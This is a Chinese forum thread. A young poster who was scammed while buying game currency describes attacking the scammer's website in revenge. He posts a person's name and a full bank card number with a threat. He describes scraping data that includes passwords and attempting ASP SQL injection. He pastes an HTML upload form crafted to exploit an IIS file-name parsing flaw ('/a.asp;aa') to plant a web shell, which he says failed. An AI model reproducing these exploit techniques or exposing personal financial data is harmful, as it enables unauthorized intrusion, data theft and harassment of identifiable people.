事情是这样的，刚刚在群聊里见到有人说可以去冲钻，于是楼主就冲了50块钱的钻！。然后就

如果没有人回我就不更了！

嗯嗯，我不知道这个姓名是真是假。赵建国，这是一个好名字
6215581606001573087。信不信我分分钟锁定你的银行卡

爬了chaomeng这个玩意的数据，第三行是密码，可使机智的少年们我是不会告诉你门密码的，截图截一半

然而chaomeng这个号的名字实在是太多了，我觉的并没有什么卵用，下一个目标开始！

没有少年看吗？

楼主把事情经过再说一下，今天玩苍翼的时候，有加qq卖钻的。然后冲完钱后发现，它说还要交500，于是楼主知道这是骗子，也怪楼主傻。。
然后楼主就准备报复了。。。自己查了下，网站用的是很老的asp的华速网游版本。然后片子不会使用这个版本，把个人信息裸露在代码中了，于是楼主通过数据爬虫，爬出信息（也可以爬qq密码什么鬼的）。。现在楼主在注入ASP漏洞，想去改它的数据库。。

ASP漏洞注入失败
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href="css/manage.css" rel="stylesheet" type="text/css">
</head>
<body>
<form name="form1" method="post" action="http://www.hackqing.cn/upfile.asp" enctype="multipart/form-data" >
<div id="esave" style="position:absolute; top:18px; left:40px; z-index:10; visibility:hidden">
<TABLE WIDTH=340 BORDER=0 CELLSPACING=0 CELLPADDING=0>
<TR><td width=20%></td>
<TD bgcolor=#ff0000 width="60%">
<TABLE WIDTH=100% height=120 BORDER=0 CELLSPACING=1 CELLPADDING=0>
<TR>
<td bgcolor=#ffffff align=center><font color=red>正在上传文件，请稍候...</font></td>
</tr>
</table>
</td><td width=20%></td>
</tr></table></div>
<table class="tableBorder" width="90%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#FFFFFF">
<tr>
<td align="center"><b><font color="#ffffff">图片上传
<input type="hidden" name="filepath" value="/a.asp;aa">
<input type="hidden" name="filelx" value="">
<input type="hidden" name="EditName" value="">
<input type="hidden" name="FormName" value="">
<input type="hidden" name="act" value="uploadfile"></font></b>
</td>
</tr>
<tr >
<td align="center" id="upid" height="80">选择文件:
<input type="file" name="file1" size="40" class="tx1" value="">
<input class=btn type="submit" name="Submit" value="开始上传" class="button" onClick="javascript:mysub()">
</td>
</tr>
</table>
</form>
</body>
</html>
这个玩意用不了＝＝。无法注入

拿到了一些数据＝＝。本宝宝要要写作业。马上就要小升初了，压力好的